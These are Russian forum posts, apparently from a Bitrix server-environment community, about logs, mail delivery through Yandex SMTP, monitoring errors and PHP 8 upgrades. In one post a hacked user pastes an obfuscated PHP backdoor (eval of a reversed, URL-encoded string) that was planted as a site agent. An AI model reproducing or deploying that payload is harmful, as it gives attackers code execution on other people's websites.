1. Посмотрите лог сервиса ntpd - в конфиге должно быть настроено куда складывает логи (конфиг тут по идее - grep log /etc/ntp.conf )
возможно тут логи /var/log/messages
2. Если нет чего-то особенного, то может быть в это время происходит какая-то нагрузка на сервер? 3. Логи или ошибка самого мониторинга, как вариант? 4. Прикрутить мониторинг на заббикс. У него такие же события будут в это время?
остался год до окончания официальной поддержки centos 7 на котором базируется основная ветка и beta vmbitrix
Да, очень актуальная проблема. Много компаний которые переходят на российские ОС - ALT ROSA RedOS Astra, но окружения устанавливаемого по скриптам нет. Нет инструкций или они устарели. Сам попытался поставить под ALT по инструкции, но столкнулся с проблемой, что установка демоверсии портала Б24 не начинается, просто стоит на месте "скачивание файлов". Импортозаместились.
Нет доступа к разделу: Проверка системы – Админ панели сайта, как исправить?
Такая же проблема. /home/bitrix/www - нет никаких .htaccess 2023-Sep-19 15:17:56 Работа с сокетами (check_socket): Fail Connection to ssl://site.ru:443 Success == Request == GET /bitrix/admin/site_checker.php?test_type=socket_test&unique_id=d630071af148c99979135c09205f56a7 HTTP/1.1 Host: site.ru
== Body == <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /bitrix/admin/site_checker.php on this server.</p> <hr> <address>Apache Server at site.ru Port 443</address> </body></html>
==========
Do you want to enable TLS for smtp.yandex.ru:587 (n|Y):Y Command returned error, Ошибка при подключении почты.
Но строка добавлена в конфиги sate available на каждый субдомен. И так же у вас может не работать из "офиса" если развёрнут AD с таким же именем домена как и сайт (все упирается в локальный DNS на AD)
Тоже подверглись взлому. помимо упомянутого файла появились 2 агента 1. $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%77%54%23%d4%03%55%d6%a5%a7%14%a6%a5%97%76%44%f4%97%36%a6%95%43%55%a6%95%b6%86%a7%d4%a6%86%45%95%23%d4%23%d4%b6%65%44%d4%b6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));
Обновился на сайте, но пока php 8.0 не заработал из коробки. Ошибка в модулях ядра. Ждём. [TypeError] call_user_func_array(): Argument #1 ($function) must be a valid callback, non-static method CSitePersonal::ShowPanel() cannot be called statically (0) /home/bitrix/www/bitrix/modules/main/classes/general/module.php:480 #0: ExecuteModuleEventEx(array) /home/bitrix/www/bitrix/modules/main/include.php:466 #1: require_once(string) /home/bitrix/www/bitrix/modules/main/include/prolog_before.php:14 #2: require_once(string) /home/bitrix/www/bitrix/modules/main/include/prolog.php:10 #3: require_once(string) /home/bitrix/www/bitrix/header.php:1 #4: require(string) /home/bitrix/www/index.php:2
Не работает отправка сообщений на почту из модуля уведомлений
Алексей Шафранский написал: , ужас! То есть на видео вы показываете что сидя на Windows 10 запускаете telnet команду и т.д. Но почту вы отправляете с виртуальной машины судя по логу выше... Как так можно
Сколько копий уже сточили про порты для smtp ynadex - не пересчитать) Видимо мало, надо еще и еще и еще Порт 465 только для почтовых клиентов типа Outlook и т.д. Для vm нужно или 25 или 587. Коннект и отправку будет осуществлять ваша виртуальная машина а не почтовый клиент на Windows. Даже в курсе все расписали но нет, 465!
А дальше классика:
Цитата
написал: Feb 21 20:00:49 host=smtp.yandex.ru tls=on auth=on user=%%%%%%% .ru from=%%%%%%% .ru recipients= i%%%%%%%.ru smtpstatus=550 smtpmsg='550 5.7.0 Sender or From header address rejected: not owned by authorized user 1613926849-ZY4enuLlWY-0nnGD6S3' errormsg='the server did not accept the mail' exitcode=EX_UNAVAILABLE
то есть настройка почты в машине была с данными ящика , но отправляем упорно от . Яндекс вам пишет, что делать так нельзя, это спам) Как быть - настроить правильно раз, вашу форму заставить отправлять данные с тем ящиком Яндекс что настроен.
Отправляем с прикрепленного ящика (что в настройках сервера был) , на нужный ящик в CRM.
Не работает отправка сообщений на почту из модуля уведомлений
Feb 21 19:59:36 host=smtp.yandex.ru tls=on auth=on user=%%%%%%% from=%%%%%%% recipients= mailsize=153 smtpstatus=250 smtpmsg='250 2.0.0 Ok: queued on vla1-cde8305024b9.qloud-c.yandex.net as 1613926776-Pjndynvi8W-xZJO1unm' exitcode=EX_OK Feb 21 19:59:37 host=smtp.yandex.ru tls=on auth=on user=%%%%%%% from=%%%%%%% recipients=, mailsize=187496 smtpstatus=250 smtpmsg='250 2.0.0 Ok: queued on iva8-174eb672ffa9.qloud-c.yandex.net as 1613926777-IiezJhWU3P-xanOWJKn' exitcode=EX_OK фев 21 20:00:02 host=smtp.yandex.ru tls=on auth=on user=%%%%%%% from=%%%%%%% recipients= smtpstatus=550 smtpmsg='550 5.7.0 Sender or From header address rejected: not owned by authorized user 1613926802-COFtUWJhjb-01nK7oNv' errormsg='the server did not accept the mail' exitcode=EX_UNAVAILABLE Feb 21 20:00:49 host=smtp.yandex.ru tls=on auth=on user=%%%%%%% from=%%%%%%% recipients= smtpstatus=550 smtpmsg='550 5.7.0 Sender or From header address rejected: not owned by authorized user 1613926849-ZY4enuLlWY-0nnGD6S3' errormsg='the server did not accept the mail' exitcode=EX_UNAVAILABLE
Такая ситуация, тоже с яндексом.
Тестовые сообщения приходят. Тесты проходятся. Но с сайта, из форм письма не приходят на info
ТП Яндекса пишет: "Пожалуйста, выполните с помощью команды telnet в момент возникновения ошибки и пришлите мне результат в виде скриншотов: Для IMAP: telnet imap.yandex.ru 993 Для POP3: telnet pop.yandex.ru 995 Для SMTP: telnet smtp.yandex.ru 465
Обращаю ваше внимание, что каждую из команд необходимо вводить отдельно в новом окне. Эта информация поможет нашим специалистам во всем разобраться.
Здравствуйте. Проблема при включении мониторинга как через панель управления сайтом так и menu,sh
В панели управления эта ошибка. "bxNetworkNode::ip_to_interface: Not found ip address on localhost"}fatal: [sever1.kvmvps]: FAILED! => {"changed": "false", "msg": "bxNetworkNode::ip_to_interface: Not found ip address on localhost"}to retry, use: --limit @/etc/ansible/monitor.retry Сервер виртуальный. Как исправить? Где прописать ip?
написал: Пост 02/#message672802 обновлен, добавлена подробная информация о новой роли transformer
Приветствую. Вроде бы прочитал про роль, но не наблюдаю в системе и обновлениях модуля transformercontroller. Включал в системе обновлений установку бет, тоже не вижу. Конвертер файлов присутствует. Подскажите, пожалуйста, есть ли ограничения по редакциям на данный модуль? Или может где-то чего-то недоглядел?
Алексей Шафранский написал: , то, что вы показываете на картинках, это модуль Монитор производительности (perfmon). Тест не адаптирован по 8ку увы, тикет у нас уже есть, разработчик в курсе проблемы.
Я сначала руками закоментил mbstring.func_overload в bitrixenv.ini и php.ini, а потом только обновился. Вот к последнему апдейту Битрикс пишут улучшена совместимость с PHP 8
Залез в меню, без костылей можно обновится только до PHP 7.2?
Когда будет 7.3, 7.4 и 8?
BitrixVM + Snort, Вопрос про использование свободной системы обнаружения и предотвращения атак Snort от компании Cisco
Хочу спросить более умудрённых СА, о том, что имеет ли смысл устанавливать систему обнаружения и предотвращения атак Snort от компании Cisco на сервера с продуктами от компании Битрикс? У кого был опыт использования? Насколько оправдана установка этой системы или достаточно встроенных систем защиты?
Печально, но сегодня отключены тикеты, отключены тикеты в тех поддержку bitrix